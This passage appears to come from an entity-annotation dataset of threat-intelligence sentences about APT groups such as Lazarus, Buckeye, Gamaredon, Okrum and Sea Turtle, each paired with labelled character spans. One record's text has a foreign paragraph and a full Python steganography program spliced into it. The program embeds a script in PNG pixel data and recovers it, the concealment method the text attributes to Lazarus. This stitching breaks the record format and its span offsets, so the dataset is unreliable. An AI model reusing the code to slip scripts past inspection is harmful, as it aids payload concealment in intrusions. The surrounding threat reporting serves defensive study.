, China , and Japan . Either way , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . According to this new alert , Hidden Cobra the U.S. government\u2019s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 . Lazarus is a very active attack group involved in both cyber crime and espionage . The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures . 
Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks . More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . The operation , known as FASTCash\u201d has enabled Lazarus to fraudulently empty ATMs of cash . In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions . It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity . In recent years , Lazarus has also become involved in financially motivated attacks . This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists . Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . 
Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware . In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured . As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks . The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . It is hard to tell if there are geopolitical motives behind this campaign by looking solely at the list of countries it was targeting , since it was not after a specific region and the victims came from different places in the world . The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user . The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities . 
Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Gamaredon Group is an alleged Russian threat group . Gamaredon Group has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user\u2019s microphone and the ability to download and execute further modules . Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware . Gamaredon Group's implants are characterized by the employment of information stealing tools \u2014 among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques . The techniques and modules employed by EvilGnome \u2014 that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools\u2014remind us of Gamaredon Group\u2019s Windows tools . We can observe that the sample is very recent , created on Thursday , July 4 . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target . 
Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament . Gaza Cybergang has been seen employing phishing , with several chained stages to evade detection and extend command and control server lifetimes . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel . Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset , which conducts widespread attacks , but is nevertheless focused on Palestinian political problems . In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation . Cylance determined that the \u2018Ghost Dragon\u2019 group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 . The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes \u2018Gh0st\u2019 as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . SPEAR has observed numerous different XOR keys utilized by Ghost Dragon . 
exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 . The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak . Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability . While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 . The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years. However , Symantec has now found evidence that the Buckeye Cyber Espionage group (aka APT3 , Gothic Panda ) began using Equation Group tools in attacks at least a year prior to the Shadow Brokers leak . Equation is regarded as one of the most technically adept espionage groups and the release of a trove of its tools had a major impact , with many attackers rushing to deploy the malware and exploits disclosed . DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar . One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . 
Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 147, "end": 160, "label": "Organization"}, {"start": 206, "end": 209, "label": "Organization"}, {"start": 230, "end": 244, "label": "Organization"}, {"start": 281, "end": 302, "label": "Malware"}, {"start": 672, "end": 705, "label": "Organization"}, {"start": 784, "end": 789, "label": "Organization"}, {"start": 932, "end": 937, "label": "Organization"}, {"start": 995, "end": 1002, "label": "Organization"}, {"start": 1005, "end": 1010, "label": "Organization"}, {"start": 1020, "end": 1039, "label": "Organization"}, {"start": 1117, "end": 1127, "label": "Organization"}, {"start": 1308, "end": 1322, "label": "Malware"}, {"start": 1323, "end": 1329, "label": "System"}, {"start": 1428, "end": 1439, "label": "Organization"}, {"start": 1453, "end": 1474, "label": "Organization"}, {"start": 1526, "end": 1533, "label": "Malware"}, {"start": 1538, "end": 1541, "label": "Malware"}, {"start": 1561, "end": 1570, "label": "Organization"}, {"start": 1573, "end": 1584, "label": "Indicator"}, {"start": 1590, "end": 1602, "label": "Malware"}, {"start": 1658, "end": 1660, "label": "System"}, {"start": 1720, "end": 1731, "label": "Indicator"}, {"start": 1786, "end": 1788, "label": "System"}, {"start": 1892, "end": 1907, "label": "Organization"}, {"start": 2053, "end": 2060, "label": "Organization"}, {"start": 2089, "end": 2104, "label": "Organization"}, {"start": 2304, "end": 2309, "label": "Organization"}, {"start": 2312, "end": 2319, "label": "Organization"}, {"start": 2441, "end": 2446, "label": "Organization"}, {"start": 2449, "end": 2453, "label": "Organization"}, {"start": 2513, "end": 2519, "label": "Organization"}, {"start": 2595, "end": 2599, "label": "Organization"}, {"start": 2602, "end": 2610, "label": "Organization"}, {"start": 2617, "end": 2624, "label": "Organization"}, {"start": 
2720, "end": 2728, "label": "Organization"}, {"start": 3099, "end": 3103, "label": "Organization"}, {"start": 3282, "end": 3289, "label": "Organization"}, {"start": 3302, "end": 3322, "label": "Organization"}, {"start": 3528, "end": 3535, "label": "Organization"}, {"start": 3690, "end": 3704, "label": "Organization"}, {"start": 3709, "end": 3730, "label": "Malware"}, {"start": 3768, "end": 3787, "label": "Organization"}, {"start": 3790, "end": 3808, "label": "Organization"}, {"start": 3815, "end": 3823, "label": "Organization"}, {"start": 4059, "end": 4067, "label": "Organization"}, {"start": 4212, "end": 4224, "label": "Organization"}, {"start": 4364, "end": 4369, "label": "Organization"}, {"start": 4411, "end": 4418, "label": "Organization"}, {"start": 4732, "end": 4741, "label": "Organization"}, {"start": 4757, "end": 4766, "label": "Organization"}, {"start": 4793, "end": 4800, "label": "Organization"}, {"start": 4910, "end": 4933, "label": "Organization"}, {"start": 4942, "end": 4950, "label": "Malware"}, {"start": 5025, "end": 5032, "label": "Indicator"}, {"start": 5037, "end": 5045, "label": "Indicator"}, {"start": 5161, "end": 5168, "label": "Organization"}, {"start": 5193, "end": 5199, "label": "Organization"}, {"start": 5331, "end": 5338, "label": "Organization"}, {"start": 5436, "end": 5443, "label": "Organization"}, {"start": 5494, "end": 5499, "label": "Malware"}, {"start": 5704, "end": 5713, "label": "Organization"}, {"start": 5719, "end": 5726, "label": "Malware"}, {"start": 5833, "end": 5840, "label": "Organization"}, {"start": 5869, "end": 5880, "label": "Organization"}, {"start": 5906, "end": 5913, "label": "Malware"}, {"start": 5944, "end": 5951, "label": "Organization"}, {"start": 6062, "end": 6069, "label": "Organization"}, {"start": 6115, "end": 6138, "label": "Organization"}, {"start": 6192, "end": 6199, "label": "Organization"}, {"start": 6299, "end": 6310, "label": "Vulnerability"}, {"start": 6311, "end": 6318, "label": "Vulnerability"}, 
{"start": 6358, "end": 6365, "label": "System"}, {"start": 6366, "end": 6379, "label": "Vulnerability"}, {"start": 6384, "end": 6397, "label": "Vulnerability"}, {"start": 6581, "end": 6588, "label": "Organization"}, {"start": 6841, "end": 6848, "label": "Organization"}, {"start": 6891, "end": 6907, "label": "Organization"}, {"start": 7117, "end": 7125, "label": "Organization"}, {"start": 7143, "end": 7150, "label": "Organization"}, {"start": 7345, "end": 7351, "label": "Organization"}, {"start": 7446, "end": 7456, "label": "Malware"}, {"start": 7630, "end": 7648, "label": "Indicator"}, {"start": 8073, "end": 8081, "label": "Malware"}, {"start": 8118, "end": 8128, "label": "Organization"}, {"start": 8149, "end": 8160, "label": "Malware"}, {"start": 8301, "end": 8314, "label": "Organization"}, {"start": 8566, "end": 8576, "label": "Organization"}, {"start": 8593, "end": 8602, "label": "Organization"}, {"start": 8724, "end": 8731, "label": "Indicator"}, {"start": 8736, "end": 8745, "label": "Organization"}, {"start": 8754, "end": 8769, "label": "Organization"}, {"start": 8807, "end": 8822, "label": "Organization"}, {"start": 8915, "end": 8935, "label": "Organization"}, {"start": 8938, "end": 8949, "label": "Organization"}, {"start": 8974, "end": 8993, "label": "Malware"}, {"start": 8996, "end": 9009, "label": "Malware"}, {"start": 9021, "end": 9046, "label": "Malware"}, {"start": 9132, "end": 9147, "label": "Organization"}, {"start": 9224, "end": 9231, "label": "Malware"}, {"start": 9234, "end": 9251, "label": "Organization"}, {"start": 9300, "end": 9326, "label": "Malware"}, {"start": 9460, "end": 9475, "label": "Organization"}, {"start": 9498, "end": 9519, "label": "Malware"}, {"start": 9603, "end": 9612, "label": "Organization"}, {"start": 9634, "end": 9637, "label": "Malware"}, {"start": 9752, "end": 9765, "label": "Indicator"}, {"start": 9792, "end": 9798, "label": "Indicator"}, {"start": 9898, "end": 9913, "label": "Indicator"}, {"start": 9935, "end": 9945, 
"label": "Indicator"}, {"start": 9968, "end": 9987, "label": "Indicator"}, {"start": 9993, "end": 10003, "label": "Malware"}, {"start": 10050, "end": 10061, "label": "Indicator"}, {"start": 10073, "end": 10085, "label": "Indicator"}, {"start": 10338, "end": 10359, "label": "Organization"}, {"start": 10453, "end": 10467, "label": "Organization"}, {"start": 10628, "end": 10640, "label": "Organization"}, {"start": 10645, "end": 10654, "label": "Organization"}, {"start": 10657, "end": 10676, "label": "Organization"}, {"start": 10679, "end": 10688, "label": "Organization"}, {"start": 10691, "end": 10704, "label": "Organization"}, {"start": 10721, "end": 10730, "label": "Organization"}, {"start": 10754, "end": 10763, "label": "Organization"}, {"start": 10766, "end": 10776, "label": "Organization"}, {"start": 10781, "end": 10788, "label": "Organization"}, {"start": 10887, "end": 10908, "label": "Organization"}, {"start": 10919, "end": 10928, "label": "Organization"}, {"start": 10933, "end": 10952, "label": "Organization"}, {"start": 10955, "end": 10976, "label": "Organization"}, {"start": 11128, "end": 11139, "label": "Organization"}, {"start": 11180, "end": 11194, "label": "Organization"}, {"start": 11211, "end": 11217, "label": "System"}, {"start": 11283, "end": 11286, "label": "Indicator"}, {"start": 11521, "end": 11528, "label": "Organization"}, {"start": 11586, "end": 11619, "label": "Organization"}, {"start": 11622, "end": 11629, "label": "Organization"}, {"start": 11650, "end": 11664, "label": "Organization"}, {"start": 11714, "end": 11723, "label": "Malware"}, {"start": 11844, "end": 11857, "label": "Organization"}, {"start": 11866, "end": 11882, "label": "Malware"}, {"start": 12071, "end": 12080, "label": "Indicator"}, {"start": 12091, "end": 12103, "label": "Organization"}, {"start": 12289, "end": 12301, "label": "Organization"}, {"start": 12304, "end": 12311, "label": "Vulnerability"}, {"start": 12349, "end": 12358, "label": "Organization"}, {"start": 12396, 
"end": 12403, "label": "Organization"}, {"start": 12427, "end": 12447, "label": "Malware"}, {"start": 12549, "end": 12558, "label": "Organization"}, {"start": 12605, "end": 12612, "label": "Vulnerability"}, {"start": 12637, "end": 12644, "label": "System"}, {"start": 12676, "end": 12683, "label": "Organization"}, {"start": 12731, "end": 12751, "label": "Malware"}, {"start": 12853, "end": 12869, "label": "Organization"}, {"start": 12986, "end": 12994, "label": "Organization"}, {"start": 13027, "end": 13034, "label": "Organization"}, {"start": 13057, "end": 13066, "label": "Organization"}, {"start": 13069, "end": 13081, "label": "Organization"}, {"start": 13096, "end": 13116, "label": "Malware"}, {"start": 13179, "end": 13187, "label": "Organization"}, {"start": 13275, "end": 13280, "label": "Malware"}, {"start": 13390, "end": 13402, "label": "Organization"}, {"start": 13443, "end": 13455, "label": "Malware"}, {"start": 13554, "end": 13561, "label": "System"}, {"start": 13562, "end": 13570, "label": "Vulnerability"}, {"start": 13615, "end": 13623, "label": "Organization"}, {"start": 13626, "end": 13634, "label": "Organization"}, {"start": 13648, "end": 13655, "label": "System"}, {"start": 13656, "end": 13671, "label": "Vulnerability"}]} {"text": "Recently , FireEye released a great report on one of the more active groups , now known as APT30 . 
The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools EternalRomance and EternalSynergy that were also released as part of the Shadow Brokers leak .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 91, "end": 96, "label": "Organization"}, {"start": 110, "end": 117, "label": "System"}, {"start": 134, "end": 147, "label": "Vulnerability"}, {"start": 225, "end": 232, "label": "Vulnerability"}, {"start": 239, "end": 253, "label": "Vulnerability"}, {"start": 258, "end": 272, "label": "Vulnerability"}, {"start": 312, "end": 326, "label": "Organization"}]} {"text": "In addition , Kaspersky discovered that the Winnti group uses a popular backdoor known as PlugX which also has Chinese origins . It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 . How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 44, "end": 50, "label": "Organization"}, {"start": 90, "end": 95, "label": "System"}, {"start": 148, "end": 156, "label": "Organization"}, {"start": 160, "end": 169, "label": "Organization"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 246, "end": 266, "label": "Malware"}]} {"text": "Previous work published by security vendor FireEye in October 2014 suggests APT28 might be of Russian origin . The Buckeye attack group had been active since at least 2009 , when it began mounting a string of espionage attacks , mainly against organizations based in the U.S .", "spans": [{"start": 43, "end": 50, "label": "Organization"}, {"start": 76, "end": 81, "label": "Organization"}, {"start": 115, "end": 122, "label": "Organization"}]} {"text": "After publishing our initial series of blogposts back in 2016 , Kaspersky has continued to track the ScarCruft threat actor . 
These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools . However , Buckeye had already been using some of these leaked tools at least a year beforehand . The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong . Beginning in March 2016 , Buckeye began using a variant of DoublePulsar (Backdoor.Doublepulsar) , a backdoor that was subsequently released by the Shadow Brokers in 2017 . However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware . During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) . One hour later , Bemstour was used against an educational institution in Belgium . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . DoublePulsar is then used to inject a secondary payload , which runs in memory only . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . 
Development of Bemstour has continued into 2019 . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . Buckeye's exploit tool , Bemstour , as well as EternalRomance and EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . In the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) . It is noteworthy that the attackers never used the FuzzBunch framework in their attacks . FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 . There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak . However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled . This RTF again exploits CVE-2017-11882 in eqnedt32.exe . The dropper then executes iassvcs.exe to perform DLL side-loading and establish persistence . 
This IP is very interesting because it connects with tele.zyns.com and old infrastructure used by Chinese APT or DDoS teams against the former Soviet republics . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash . According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking . Today , this malware is still actively being used against the Philippines . Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 . Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware . \u201cXagent\u201d is the original filename Xagent.exe , whereas seems to be the version of the worm . \u201cXagent \u2013 A variant of JbossMiner Mining Worm\u201d \u2013 a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms . Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang \u2013 a cyberespionage campaign directed at diplomatic organizations in Europe . 
We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group \u2013 a backdoor we named Okrum . Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group \u2013 BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 . The Ke3chang group behind the attacks seemed to have a particular interest in Slovakia , where a big portion of the discovered malware samples was detected; Croatia , the Czech Republic and other countries were also affected . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . The story continued in late 2016 , when we discovered a new , previously unknown backdoor that we named Okrum . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . In addition to file-based protection , customers of the DeepSight Intelligence service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group . 
In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation . North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies\u2019 trade secrets . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor . Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region . 
Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group . The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script . Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file . Once the script runs , it passes the decoded script from the image file to the Windows command line in a variable $x , which uses cmd.exe to execute the obfuscated script and run it via PowerShell . The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names . In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims . The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations . The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors . In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed . The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . 
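The Okrum passage above (payload embedded within a legitimate PNG image) and the Lazarus passage (Invoke-PSImage used to embed a PowerShell script into an image file) describe the same trick : hiding a script in the least-significant bits of an image's pixel data so that the file still opens as a normal picture . The Python below is an added example for this page , not code from ESET , Talos , the Lazarus toolset or the Invoke-PSImage project ; it uses a simplified scheme of its own (one payload bit per colour byte , after a 4-byte length prefix ; this layout is an assumption and is not Invoke-PSImage's real encoding) , writes and parses a minimal 8-bit RGB PNG itself so it runs offline , and builds its own constructed carrier image .

```python
import struct
import zlib

PNG_SIG = bytes([137, 80, 78, 71, 13, 10, 26, 10])


def png_chunk(kind, data):
    # length + type + data + CRC32 over (type + data), as the PNG spec requires
    body = kind + data
    return struct.pack('>I', len(data)) + body + struct.pack('>I', zlib.crc32(body) & 0xffffffff)


def assemble_png(width, height, scanlines):
    # IHDR: 8-bit depth, colour type 2 (RGB), default compression/filter, no interlace
    ihdr = struct.pack('>IIBBBBB', width, height, 8, 2, 0, 0, 0)
    return (PNG_SIG + png_chunk(b'IHDR', ihdr)
            + png_chunk(b'IDAT', zlib.compress(bytes(scanlines)))
            + png_chunk(b'IEND', b''))


def make_png(width, height, seed=7):
    # Constructed carrier (not a real image): pseudo-random RGB noise from a small LCG,
    # every scanline written with filter type 0 (None).
    rows = bytearray()
    v = seed
    for _ in range(height):
        rows.append(0)
        for _ in range(width * 3):
            v = (v * 1103515245 + 12345) & 0x7fffffff
            rows.append((v >> 16) & 0xff)
    return assemble_png(width, height, rows)


def parse_png(data):
    # Walk the chunk list, collect IDAT, inflate, and strip the per-row filter byte.
    if data[:8] != PNG_SIG:
        raise ValueError('not a PNG')
    pos, idat, width, height = 8, bytearray(), None, None
    while pos + 8 <= len(data):
        length = struct.unpack('>I', data[pos:pos + 4])[0]
        kind = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        if kind == b'IHDR':
            width, height = struct.unpack('>II', body[:8])
            if body[8] != 8 or body[9] != 2:
                raise ValueError('only 8-bit RGB is handled here')
        elif kind == b'IDAT':
            idat += body
        elif kind == b'IEND':
            break
        pos += 12 + length
    raw = zlib.decompress(bytes(idat))
    stride = width * 3 + 1
    pixels = bytearray()
    for y in range(height):
        row = raw[y * stride:(y + 1) * stride]
        if row[0] != 0:
            raise ValueError('filtered scanlines are not handled here')
        pixels += row[1:]
    return width, height, pixels


def rebuild_png(width, height, pixels):
    stride = width * 3
    scanlines = bytearray()
    for y in range(height):
        scanlines.append(0)
        scanlines += pixels[y * stride:(y + 1) * stride]
    return assemble_png(width, height, scanlines)


def embed_in_png(png, payload):
    # Overwrite the LSB of consecutive colour bytes with the bits of [len][payload].
    width, height, px = parse_png(png)
    blob = struct.pack('>I', len(payload)) + payload
    if len(blob) * 8 > len(px):
        raise ValueError('carrier too small for payload')
    i = 0
    for b in blob:
        for bit in range(7, -1, -1):
            px[i] = (px[i] & 0xfe) | ((b >> bit) & 1)
            i += 1
    return rebuild_png(width, height, px)


def extract_from_png(png):
    # The analyst side: read the length prefix, sanity-check it against the carrier
    # capacity, then reassemble the hidden bytes from the LSB plane.
    _, _, px = parse_png(png)

    def read(start, n):
        out = bytearray()
        for k in range(n):
            v = 0
            for bit in range(8):
                v = (v << 1) | (px[start + k * 8 + bit] & 1)
            out.append(v)
        return bytes(out)

    n = struct.unpack('>I', read(0, 4))[0]
    if 32 + n * 8 > len(px):
        raise ValueError('length prefix exceeds carrier: no payload in this layout')
    return read(32, n)


if __name__ == '__main__':
    carrier = make_png(64, 48)
    stego = embed_in_png(carrier, b'Write-Output hello-from-image')
    print(len(carrier), len(stego), extract_from_png(stego))
```

The carrier remains a well-formed PNG with identical dimensions , which is why a hidden script survives being served as an ordinary image ; the rest of the Lazarus chain (a macro fetching the image and handing the decoded text to cmd.exe and PowerShell) is outside this example .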
Captured legitimate user credentials when users interacted with these actor-controlled servers . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure . On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar . During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate . One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks . At this time , we do not believe that the attackers found a new ASA exploit . Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network . 
